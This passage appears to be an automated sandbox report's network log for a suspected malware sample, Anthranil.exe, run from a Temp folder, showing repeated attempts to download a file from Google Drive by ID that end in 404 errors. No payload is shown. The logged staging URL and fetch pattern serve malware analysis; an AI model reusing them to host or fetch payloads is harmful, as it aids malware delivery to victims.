                                                                                  13192.168.2.449302142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:46 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:47 UTC1851INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgShivJ69ND35w3dJbu-kfuHY7HPtA2vpk3iP5ROtaXYfaeRrStXnKamEOy7XPkQyZfk5ENd6SE
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:46 GMT
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-7KwAU09EzDaMcOyRvIx1lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 41 4b 73 59 76 7a 4b 65 7a 64 75 52 4d 7a 55 48 48 35 45 32 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AAKsYvzKezduRMzUHH5E2A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.449312216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:47 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:48 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:48 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-8-sNm3Vej9T3eQlqqdoMVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.449313142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:49 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:49 UTC1844INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgSeH1dNT61mN-VS3GHaYMELFq-9LTWkLHSh2GgvkPyB2eTqFfnXyp6lVVhAi4UWmy1T
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:49 GMT
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-4qJZgdpT07Uuhd1uYITnuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 48 32 37 6d 41 75 4b 35 58 5f 47 55 73 47 54 42 48 6d 6d 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KH27mAuK5X_GUsGTBHmmbg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.449314216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:50 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:50 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:50 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-qqVxUNtUTRGLG0v7dZhyuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.449315142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:51 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:51 UTC1844INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgRCCopv9kcEaAbDGGMxs6w84S9siUxAMjN4r7LgbOLjQavjH8APpCnyk2R5pzZMJghN
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:51 GMT
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-fvsjmTXeHKtqQjIn6RSq5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:51 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 37 55 78 4d 6e 71 77 50 77 4e 67 35 48 56 47 42 59 67 34 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U7UxMnqwPwNg5HVGBYg4KQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.449316216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:52 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:52 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:52 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-VmJJyD-IncLnuqb8uc2vGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.449317142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:53 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:54 UTC1844INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTO5zPYZIhjM4ikLP9B8xuEOay9YnrXi71GJvViiT33y4MN_kz4N7sJd55KcRJGB1qc
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:53 GMT
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-jr1iZeOWVIKXrfKJpGwY-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:54 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 45 76 4e 6c 78 2d 63 46 52 4b 37 69 6b 52 6a 53 52 65 5a 51 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BEvNlx-cFRK7ikRjSReZQA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.449318216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:54 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
